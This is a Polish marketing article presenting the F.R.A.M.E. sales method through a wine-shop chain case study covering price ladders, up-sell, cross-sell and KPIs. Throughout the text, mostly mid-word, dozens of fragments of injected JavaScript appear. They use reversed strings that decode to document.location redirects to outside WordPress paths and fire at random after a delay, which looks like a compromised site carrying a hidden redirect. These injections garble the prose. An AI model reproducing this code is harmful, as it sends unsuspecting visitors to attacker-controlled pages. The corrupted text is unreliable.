In Artykuły, Handel

FRAME: z każdym można wygrać! Sprzedaż, Konkurencja, F.R.A.M.E.
Czy w przypadku nasilonej konkurencji i traceniu udziałów w rynku można podnieść sprzedaż i marżę? W toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dość krótkim czasie i bez dużych nakładów na reklamę? Przy zas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowaniu naszej me toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tody F.R.A.M.E. jest  toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to możliwe! Jako przykład potraktujmy temat sieci sklepów z winami, która przegrywając konkurencję z dyskontami, no toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towała zmniejszoną sprzedaż. Zgodnie z naszą me toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todą F.R.A.M.E.:

FRAME schemat: rozejrzyj się, zidentyfikuj potencjał, ułóż plan, ustal KPI, wdrożenie, modyfikacja, sukces (albo porażka)

Rozejrzyj się

Sieć dysponowała setkami placówek, umieszczonymi na terenie centrów handlowych i zatrudniała ponad 1000 pracowników, którzy posiadali dużą wiedzę produk toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tową, ale brakowało im znajomości technik sprzedaży. W ofercie panowała przypadkowość i nieuporządkowanie. Produkty podzielone były na kraje, ale bez głębszego uzasadnienia.

Oceń potencjał

Po zapoznaniu się z sytuacją, okazało się, że sieć dysponuje sporym potencjałem. Koncentrując się na ofercie zauważyliśmy, że można:

  • wydzielić nowe grupy asortymen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towe
  • uzupełnić luki w ofercie o produkty nowe i komplementarne
  • s toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować up-sell  i cross-sell
  • ustalić na nowo i w sposób przemyślany drabinki cenowe

Wszystkie działania miały odnosić się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do paragonu, wejść i konwersji. Oczywiście warunkiem, by zmiany odniosły skutek było poinformowanie rynku, właściwy merchendasing i znalezienie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostawców, wprowadzenie odpowiedniego systemu motywującego oraz skuteczne zarządzanie.

Zbuduj plan

Budując plan wykorzystania potencjału przede wszystkim stworzyliśmy nowe drabinki cenowe. Odzwierciedlały sposób poszukiwania toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru przez klienta i umożliwiały up-sell. Wcześniej klienci wychodzili z pustymi rękami, zatem wykorzystując nowy trend wprowadziliśmy nowe grupy asortymen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towe – wina z Australii i inne wina ekologiczne, tańsze przy porównywalnej jakości. Zadbaliśmy także o lekceważoną toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotąd grupę klientów – singli, dla których wprowadziliśmy małe szampany, w sam raz dla jednej osoby. Dodatkowo w ofercie pojawiła się szeroka gama akcesoriów, które miały być aktywnie polecane, a ich zas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowanie tłumaczone przez sprzedawców.

Nowy system motywacyjny miał skłonić sprzedawców toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do up-sell – przekonania toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do droższego wina lub polecania toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowej butelki, żeby nie robić zakupów dwa razy oraz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do cross-sell – rekomentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowania zakupu win o krzyżowych smakach (słodkie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do wytrawnego i odwrotnie dla drugiej osoby o innym guście). Zas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowano także ceny marketingowe, zaokrąglając końcówki w górę. Ten zabieg w is toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totny sposób miał wpływać na marżę.

Określ KPI

By mierzyć efekty i porównać wyniki z założeniami,  dla poszczególnych działań określiliśmy KPI. Były toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to KPI I i II poziomu:

  • Efekt wprowadzenia nowych grup asortymen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towych – mierzyliśmy wzrost konwersji i wielkość średniego paragonu.
  • Efekt wypełnienia luk w ofercie – mierzyliśmy wzrost konwersji i co który paragon ma toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowe akcesorium.
  • Efekt up-sell – mierzyliśmy średnią cenę sprzedanej butelki i liczbę butelek na paragonie.
  • Efekt cross-sell – mierzyliśmy rodzaj butelek na paragonie (krzyżowe smaki).
  • Wpływ cen marketingowych – mierzyliśmy średnią cenę sprzedanej butelki.

Wprowadź w życie

Całość trzeba było wesprzeć rozwiązaniem informatycznym. Nikt nie był w stanie ręcznie zapanować nad setkami placówek, tysiącami osób i dziesiątkami tysięcy kombinacji zdarzeń.

Zmodyfikuj

Po wdrożeniu okazało się, że niezbędne będą toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowe modyfikacje. Co prawda nowe grupy produktów przyciągnęły uwagę nowych klientów, którzy akurat takimi byli zainteresowani, a nowe witryny sklepowe i asortyment sprawiały wrażenie, że sklep jest bardziej specjalistyczny i profesjonalny. Jednakże, ponieważ  zrezygnowaliśmy z drogiego marketingu ATL, nie stało się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to od razu. Prócz nowych witryn, skutek odnosił głównie marketing szeptany, „word of mouth”.

Wpływ wprowadzenia nowych Grup na wejścia. Miesiące, które upłynęły od wprowadzenia nowych Grup

Okazało się jednak, że sprzedawcy nie radzą sobie z polecaniem toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowych produktów. Uważali, że polecanie drugiej butelki czy akcesoriów toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to niegrzeczne nagabywanie. Spieszyli się i chcieli zakończyć obsługę jak najszybciej. Mieli wrażenie, że dzięki temu więcej sprzedadzą i panowało wśród nich przekonanie, że klient, mając określony budżet na zakupy, nie wyda więcej. By toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to przełamać niezbędne były toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowe działania:

  • coaching i szkolenie sprzedawców
  • przemyślane argumenty
  • podkreślanie indywidualnych celów poszczególnych sprzedawców
  • odpowiedni merchandising.

By wypełnić drabinki asortymen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towo-cenowe, potrzebne były toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostawy nowych produktów, ale nie mogliśmy znaleźć odpowiednich produktów w odpowiednich cenach, ani dla nowych grup, ani dla „traffic builders”. Tu także niezbędne były modyfikacje:

  • ponowne przemyślenie drabinki
  • znalezienie alternatywnych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostawców
  • wprowadzenie prywatnej marki
  • własny transport
  • system wynagrodzeń.

Celebruj zwycięstwo

Efekty, zwłaszcza przy braku drogiego marketingu ATL, były wyjątkowo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobre. Całość działań zamknęła się w 9 miesiącach. Podwoiły się średnie obroty na sklep i znacznie wzrosła konwersja.

 FRAME - celebrujemy zwycięstwo. KPI (konwersja, wejścia, ilość transakcji, paragon), War 	<script srcset=$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość. Obrót miesięczny per sklep.” width=”720″ height=”354″ />

Jeśli chcesz zobaczyć, co F.R.A.M.E. może zrobić dla Ciebie, skontaktuj się z nami:

Błąd: Brak formularza kontaktowego.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.

Retail Is Detail, czyli diabeł tkwi w szczegółach. Nagłówek książki RID (Andrzej Mrugała)